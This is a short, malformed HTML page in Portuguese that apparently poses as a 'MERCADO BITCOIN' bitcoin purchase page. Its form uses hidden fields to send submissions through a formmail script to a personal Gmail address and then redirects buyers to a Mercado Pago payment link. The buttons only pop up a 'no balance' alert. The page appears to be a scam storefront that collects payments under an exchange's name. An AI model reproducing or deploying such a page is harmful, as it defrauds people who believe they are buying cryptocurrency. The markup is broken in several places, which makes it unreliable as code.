<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//pt-BR">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>
<body><h3></h3><h3>
<img src="bitcoin.jpg" class="foto">

saldo 0.00
<div class=" geral">
<div class="recarga">MERCADO BITCOIN
</div><br><br>
QUAL VALOR VOCE DESEJA COMPRA DE BITCOIN <br><br>
<input class="box" type="tel" size="2" name="" value=""maxlength="13"required>
</div>





<form action="https://formmail.kinghost.net/formmail.cgi" method="POST">&nbsp; 




&nbsp;<input type="hidden" name="recipient" value="multijogo1980@gmail.com"> &nbsp;
&nbsp;
&nbsp;
&nbsp;<input type="hidden" name="redirect" value="https://link.mercadopago.com.br/multijogo">&nbsp;
&nbsp;
&nbsp;
&nbsp;<input type="hidden" name="subject" value="Assunto"  <input="">


<input maxlength="5" class="form-control input-lg" id="disabledInput" name="total" type="hidden" placeholder="R$" readonly=" disabled">


<input maxlength="5" id="n1" type="hidden" name="hiddentotal" value="30">
<span class="input-group-addon"></span>
<br>
<br>
<input class="valor" maxlength="2" type="hidden" size="8" name="valor" value="" placeholder="R$" autocomplete="off" onchange="this.form.total.value=checkChoice(this);">
 <label class="btn btn-default">


&nbsp;<input class="btn" type="submit" name="" value="COMPRAR" select="button alt" onclick="funcao1()">
<input class="btn" type="submit" name="" value="vender" select="button alt" onclick="funcao1()">


&nbsp; 
&nbsp; 

<img src="grafico.gif" class="foto">

<style>
body {
    background:black;
    color:white;
    height:100%;
    justify content:center;
}
.geral {
    position:relative;
}
.recarga {
    margin-left:110px;
    
}
.box {position:relative;
    width:80%;
    height:30px;
    border:2px solid red;
    margin-left:40px;
    border-radius:%;
    margin-left:px;
}
.recar{
    position:relative;
     width:40%;
    height:50px;
    margin-left:30px;
    bottom:0;  
    text-align:center; 
    justify content :center
}
.btn {
    position:relative;
    width:40%;
    height:50px;
    margin-left:10px;
    bottom:10;
}
.foto {
    width:100%; 
    height:100px;
}
h {
    margin-left:5px;
}
.rvalor {
    position:relative;
     width:40%;
    height:50px;
    margin-left:10px;
    text-align:center;
    bottom:0;
    
}
.box focu {
    
}
</style>
<script>
function funcao1(){
    alert ("VOCE NAO TEM SALDO PARA RECARREGAR.");
}
</script>